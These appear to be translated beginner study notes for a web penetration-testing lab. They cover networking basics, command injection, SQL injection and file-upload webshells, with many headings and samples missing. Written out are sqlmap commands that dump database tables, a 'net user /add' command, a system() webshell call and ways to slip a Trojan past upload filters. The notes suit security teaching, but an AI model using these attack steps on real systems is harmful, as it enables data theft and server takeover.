Table of contents
TCP/IP architecture (IP and ports):
Intranet (LAN) IP and public network (Internet) IP:
How to determine whether your computer is on the internal network or the public network:
Public IP: Internet IP address.
What is a port: It is the unique identification of an application (service) in the computer.
HTTP protocol - the basis for website access:
BS architecture: Browser---Send request--->Server---Response--->Browser
What is the HTTP protocol: Hypertext Transfer Protocol
There are eight common HTTP request methods, commonly used are get and post:
Penetration attempt workaround:
What is SQL: a language used to manipulate databases (Structured Query Language)
How to query data in the database:
How to determine whether there is a SQL vulnerability:
Use SQL-map to automate attacks:
Pre-knowledge map:
TCP/IP architecture (IP and ports):
What is IP: It is the unique identification (coordinates, code name) of a computer on the Internet, used to find computers on the Internet.
When visiting a website: The domain name will be resolved to IP through DNS (Resolution Service).
Therefore, the prerequisite for interoperability is that both parties can find the other party's IP address.
Intranet (LAN) IP and public network (Internet) IP:
Intranet IP: The network within the router can connect to the Internet, but the Internet cannot directly connect to the intranet (port mapping is required)
How to determine whether your computer is on the internal network or the public network:
--Enter jipconfig, ifconfig (Linux, macos) on the local computer command line to view the IP address
--If a router is used, check the external network IP in the router management interface
--Search IP on Baidu and check whether the IP displayed by Baidu is consistent with the IP obtained by the local computer (or router)
--If it is inconsistent, it will be judged to be the internal IP.
Inconsistent, the current connection is to the intranet.
Public IP: Internet IP address.
It can directly communicate with Internet resources without port mapping. Daily applications include remote monitoring of cameras, remote computer booting, console game interconnection, NAS, etc.
The IP address is like a home address. The public IP is the community address, and there are many residents in the community. The internal IP is the specific house number of your home. You can go out of the community (the internal network connects to the Internet), but outsiders cannot enter your home. The home needs to pass the gate verification (the public network cannot directly connect to the intranet).
What is a port: It is the unique identification of an application (service) in the computer.
Port is the free translation of English port, which can be considered as the outlet for communication between the device and the outside world.
Ports can be divided into virtual ports and physical ports. Virtual ports refer to ports inside a computer or a switch router and are invisible.
Ports are generally sorted using numerical numbers. (The website is usually port 80)
The source port (client) port is random, and the destination port (server) port is fixed to enable monitoring. The port range is 0~65535
HTTP protocol - the basis for website access:
BS architecture: Browser---Send request--->Server---Response--->Browser
What is the HTTP protocol: Hypertext Transfer Protocol
The transmission protocol defines the format for data transmission between the browser and the client (unified standard specification)
Process: The browser requests the server request message ----> the server responds to the request response message
Features:
--Based on tcp/ip protocol
--The default port number is 80 (can be changed)
--One-to-one correspondence between requests and responses
--Each request is independent of each other and is a stateless protocol ("stateless" ensures the security of website transmission)
Request message: 
What is uri: "Uniform Resource Locator"
Request header: used to identify the requesting party
Request blank line: required, this is a fixed format
Request body: empty
There are eight common HTTP request methods, commonly used are get and post:
Get request: The request parameters are in the url address, and the url has a length limit
Post request: The request parameters are in the request body and there is no size limit.
the difference:
--get parameter "wk=111" is placed at the end of the URL and added "?"
The --post parameter is placed in the request body.
--Post's request header has an additional Content-Type at the end
Request header analysis:
Response message:
Response status code:
Common web vulnerabilities:
---SQL injection ---XSS ---File upload ---Deserialization ---File inclusion ---CSRF
---Command execution ---Information leakage ---XXE ---SSRF ---Unauthorized access
SQL injection: Leakage and damage to the database. There may be sensitive information such as account passwords in the database.
File upload: upload backdoor viruses and Trojans to the website, damaging the website and even the system
Command execution: Obtain command permissions of the target machine, execute illegal commands, destroy or control the victim machine
Command execution: This vulnerability generally occurs because the application system is designed to provide users with specified interfaces for remote command operations. For example, the web management interfaces of our common routers, firewalls, intrusion detection and other equipment generally provide users with Provide a web interface for ping operation. The user inputs the target IP from the web interface. After submission, the background will perform a ping test on the IP address and return the test results. And if the designer does not implement strict security controls when completing this function, it may cause the attacker to submit malicious commands through this interface and let the background execute them, thereby obtaining the background server permissions.
Command connector:
cmd1 | cmd2 : Regardless of whether cmd1 is executed successfully, cmd2 will be executed.
cmd1 ; cmd2 : No matter whether cmd1 is executed successfully or not, cmd2 will be executed.
cmd1 & cmd2 : Regardless of whether cmd1 is executed successfully, cmd2 will be executed.
cmd1 || cmd2 : Execute cmd2 only if cmd1 fails to execute
cmd1 && cmd2 : only executed after cmd1 executes successfully
Common cmd commands:
whoami (view current username}
ipconfig (view network card information)
shutdown -s -t 0 (shutdown)
net user [username] [password] /add (add a new user with username and password password)
type [file_name] (view filename file content)
cmd defense low:
cmd defense medium:
The most efficient method: filter command connectors---replace these symbols with empty symbols, or terminate execution if the user enters these symbols.
Defect: When filtering command connectors, all five are not written, so the connectors that are not written can still be executed.
Penetration attempt workaround:
White box testing: you can see the source code and view the source code filtering mechanism
Black box testing: Can’t see the source code, try common command connectors in sequence
cmd defense high:
Note: Observe carefully whether the developer has made any mistakes, such as the habit of typing spaces from time to time, resulting in filtering that is not connectors.
This filter is not "|" , but "|" (one more space)
cmd defense impossible:
Source code:
analyze:
Typical algorithm analysis: (Organization-->Split-->Verification-->Restore)
SQL injection:
What is SQL injection: It is a security vulnerability that occurs at the application and database layers. In short, SQL instructions are injected into the input string, and character checks are ignored in poorly designed programs. Then these injected malicious instructions will be mistaken by the database server as normal SQL instructions and run. So it was destroyed or invaded.
What is SQL: a language used to manipulate databases (Structured Query Language)
How to query data in the database:
How to attack:
The purpose is to change the original SQL statement written by the website developer
The source code is as follows:
How to determine whether there is a SQL vulnerability:
How to inject:
By changing the subsequent data, you can try out the number of columns/fields based on true or false.
Union query table: a roster of names of individual data tables
Union means joint query, querying multiple tables at one time
Use SQL-map to automate attacks:
That is, type: python sqlmap.py -u "URL to be detected" --the cookie copied to
How to get cookies :
F12--->Network--->Reload--->Select the first line--->Message header--->Request header
Database injection vulnerability found: name is "mysql"
Get the database name : python sqlmap.py -u "URL to be detected" --copied cookie --dbs
get:
Get the specified database table: python sqlmap.py -u "URL to be detected" --copied cookie -D name of the data table you want to obtain --tables
Definition:
-D: Database specifies the database name you want to obtain
--tables: list database tables
get:
There are two tables shown: guestbook and users
Get the specified database column/table item:
get:
Get target data:
That is, add: "--dump"
get:
Since passwords are usually encrypted:
We are given three options: password blasting/present directly without blasting/exit
After choosing not to explode, you get:
How to defend:
The most efficient method: filter user input to prevent SQL statements from being entered, replace special symbols with empty spaces, or terminate execution if the user enters a SQL statement.
Adding "\" before the sql statement we entered made our sql statement syntax incorrect.
Still filtering:
Classification of webshell:
Typical one-sentence Trojan:
After writing the Trojan, upload it to the server
Use hackbar to upload instructions: pass=system('instruction'); to achieve the desired operation
use tools:
Tool acquisition: https://github.com/AntSwordProject/AntSword-Loader
Ant Sword operation:
Right click on the blank area to add data
URL: Fill in the location of the Trojan you uploaded.
Password: the part enclosed in brackets in the uploaded file
After the test is successful, click Add and double-click to open to see the files on the other party's disk; there are many options when you right-click, and you can even open cmd to execute further commands.
At this point we have successfully taken over the other party's system
How to defend:
intermediate:
Solution:
advanced:
Since the source code will detect the size of files and pictures separately, we must have pictures as cover. We merge the Trojan and pictures and call out cmd:
But the picture at this time is not a simple Trojan horse. You cannot simply use Ant Sword to connect and perform the next operation.
Solution 1:
Then use Ant Sword to add data and enter the password. The URL is the above address. However, for some websites that need to be logged in, cookies need to be given to Ant Sword to log in.
Click Request Information, enter name (i.e. cookie) and value (manually obtain the specific content of the cookie from browser F12)
You can connect smoothly.
impossable: standard defense writing method
The essence: Compress and encode images, so any Trojan we write will no longer exist after recoding.
Using kali:
metasploit:
Since there are many software updates, you can turn off the update option if you are afraid of trouble.
If the font is too small, you can use shift+ctrl+"+" to enlarge the font.
Usage rules:
Example: Eternal Blue vulnerability:
set up:
After the attack is complete:
